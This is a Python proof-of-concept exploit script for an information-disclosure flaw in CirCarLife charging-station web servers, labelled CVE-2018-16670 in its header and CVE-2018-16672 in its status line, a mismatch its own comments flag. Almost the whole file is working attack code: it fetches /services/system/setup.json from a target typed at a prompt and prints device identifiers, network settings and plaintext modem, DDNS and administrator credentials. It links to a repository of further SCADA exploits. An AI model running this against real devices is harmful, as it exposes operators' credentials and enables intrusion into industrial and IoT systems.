#POC for CVE-2018-16670 (NOTE: the status line printed by lsetup() names CVE-2018-16672 -- the two identifiers disagree; confirm which one covers the /services/system/setup.json disclosure before citing this script)
#More POCs and complete log parser for credentials and system specifications disclosure at https://github.com/SadFud/Exploits/tree/master/Real%20World/SCADA%20-%20IOT%20Systems
import json
import re

import requests
from requests.auth import HTTPDigestAuth
from termcolor import colored
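# Sections of setup.json in the order the POC walks them: one
# ("[*] ..." header, JSON section key, [("[+] ..." label, field key), ...])
# per section.  Labels and headers are reproduced verbatim from the original
# print statements so the output stays diff-compatible with earlier runs.
_SETUP_SECTIONS = [
    ('[*] Processing device configuration data: ', 'device', [
        ('[+] MAC Address: ', 'mac'),
        ('[+] IMEI: ', 'imei'),
        ('[+] ICCID: ', 'iccid'),
        ('[+] IMSI: ', 'imsi'),
    ]),
    ('[*] Processing network configuration data: ', 'network', [
        ('[+] Hostname: ', 'hostname'),
        ('[+] ClientId: ', 'clientid'),
        ('[+] IP address: ', 'ip'),
        ('[+] Netmask: ', 'netmask'),
        ('[+] Gateway: ', 'gateway'),
        ('[+] Name server 0: ', 'nameserver0'),
        ('[+] Name server 1: ', 'nameserver1'),
    ]),
    ('[*] Processing locale options configuration data', 'locale', [
        ('[+] Language: ', 'language'),
        ('[+] Currency: ', 'currency'),
    ]),
    ('[*] Processing public address configuration data', 'paddress', [
        ('[+] Host type: ', 'hosttype'),
        ('[+] Host: ', 'host'),
    ]),
    ('[*] Processing time configuration data', 'time', [
        ('[+] NTP Server 0: ', 'ntpserver0'),
        ('[+] NTP server 1: ', 'ntpserver1'),
        ('[+] Timezone: ', 'timezone'),
    ]),
    ('[*] Processing GPRS modem configuration data', 'modem', [
        ('[+] Acess point name: ', 'apn'),
        ('[+] Username: ', 'usr'),
        ('[+] Password: ', 'pwd'),
        ('[+] Reset: ', 'reset'),
        ('[+] Ping Ip: ', 'pingip'),
        ('[+] Ping period: ', 'pingperiod'),
        ('[+] Ping auto reset: ', 'pingautoreset'),
    ]),
    ('[*] Processing DDNS configuration data', 'ddns', [
        ('[+] DDNS server: ', 'server'),
        ('[+] DDNS host: ', 'host'),
        ('[+] DDNS Username: ', 'usr'),
        ('[+] DDNS password: ', 'pwd'),
    ]),
    ('[*] Processing security configuration data', 'security', [
        ('[+] Username: ', 'user'),
        ('[+] Password: ', 'passwd'),
    ]),
    ('[*] Processing services configuration data', 'services', [
        ('[+] iManager', 'imanager'),
        ('[+] Active-Integration: ', 'activeIntegration'),
        ('[+] Web Editor: ', 'webeditor'),
        ('[+] SCADA Applet: ', 'appletscada'),
        ('[+] Html5: ', 'html5'),
    ]),
]

# C0 controls, DEL and C1 controls: enough to neutralise ESC / 8-bit CSI
# sequences and line-splitting characters in values echoed to a terminal.
_CONTROL_CHARS = re.compile(r'[\x00-\x1f\x7f-\x9f]')


def _printable(value):
    """Render one setup.json value for the terminal.

    Every value comes straight from the target device and is therefore
    untrusted: a tampered or hostile device could embed ANSI escape sequences
    in, say, the hostname and drive the operator's terminal.  Control
    characters are stripped; non-string values (the modem/services flags are
    numbers or booleans in the original) are str()-ed as before; a missing
    key renders as '<missing>' instead of raising KeyError.
    """
    if value is None:
        return '<missing>'
    # type(u'') is unicode on Python 2 and str on Python 3, which is what
    # json.loads hands back in each case.
    text = value if isinstance(value, type(u'')) else str(value)
    return _CONTROL_CHARS.sub('', text)


def _dump_setup(datos):
    """Print every known setup.json field, section by section, to stdout.

    A section that is absent or not an object is treated as empty so that a
    firmware revision with a slightly different layout still yields the rest
    of the data rather than aborting with a KeyError halfway through.
    """
    for header, section, fields in _SETUP_SECTIONS:
        print(colored(header, 'blue'))
        values = datos.get(section)
        if not isinstance(values, dict):
            values = {}
        for label, key in fields:
            print(colored(label, 'green') + _printable(values.get(key)))


def lsetup(user, pwd, target=None, timeout=30):
    """Fetch /services/system/setup.json with HTTP Digest auth and dump it.

    Args:
        user: username for the CirCarLife web server.
        pwd: password for the CirCarLife web server.
        target: base URL ("http://host:port").  Defaults to the module-level
            ``target1`` assigned by the interactive prompt at the bottom of
            the file, which is what the original code read implicitly.
        timeout: seconds to wait for the device.  The original request had no
            timeout and would hang indefinitely on a silent host.

    Prints to stdout only; returns None.  Output is diagnostics plus the
    device, network, modem, DDNS and login data the endpoint discloses,
    including plaintext credentials -- handle the captured output
    accordingly.
    """
    base = target1 if target is None else target
    # NOTE(review): the file header names CVE-2018-16670 while this status
    # line names CVE-2018-16672 -- confirm which identifier applies.
    print(colored('[*] Exploiting CVE-2018-16672 to leak information', 'blue'))
    try:
        r1 = requests.get(base + '/services/system/setup.json',
                          auth=HTTPDigestAuth(user, pwd), timeout=timeout)
    except requests.exceptions.RequestException as exc:
        # Connection refused / timeout / DNS failure: report instead of
        # dumping a traceback.
        print(colored('[-] Unable to retrieve the setup config file', 'red')
              + ' (' + str(exc) + ')')
        return
    body = r1.text
    # 401 is the authoritative rejection; the substring check keeps the
    # original behaviour for firmware that answers 200 with a "not granted"
    # page.
    if r1.status_code == 401 or 'not granted' in body:
        print(colored('[-] Error, login failed', 'red'))
        return
    print(colored('[+] Setup information leaked'))
    print(colored('[*] Parsing setup file', 'blue'))
    # The original accepted any body longer than 5 bytes and then let
    # json.loads raise; parse first and treat anything but a JSON object as
    # a failed retrieval.
    try:
        datos = json.loads(body)
    except ValueError:
        datos = None
    if not isinstance(datos, dict):
        print(colored('[-] Unable to retrieve the setup config file', 'red'))
        return
    _dump_setup(datos)
    # Informational only: no OCPP parsing is implemented in this script.
    print(colored('[*] Parsing Open Charge Point Protocol configuration file', 'blue'))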
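if __name__ == '__main__':
    # The original is a Python 2 script (raw_input); keep the prompts working
    # under either interpreter without ever falling back to py2's eval-ing
    # input().
    try:
        _ask = raw_input
    except NameError:
        _ask = input
    # Strip the host too: trailing whitespace from the prompt would otherwise
    # end up inside the URL and break every request.
    url = _ask('Insert target ip: ').strip()
    # The device is spoken to over plain HTTP on port 80.  Digest auth keeps
    # the password itself off the wire, but the disclosed setup.json (modem,
    # DDNS and login secrets included) travels in clear text.
    target1 = 'http://' + url + ':80'
    luser80 = _ask('Insert username for login at circarlife server: ')
    lpasswd80 = _ask('Insert password for login at circarlife server: ')
    lsetup(luser80.strip(), lpasswd80.strip())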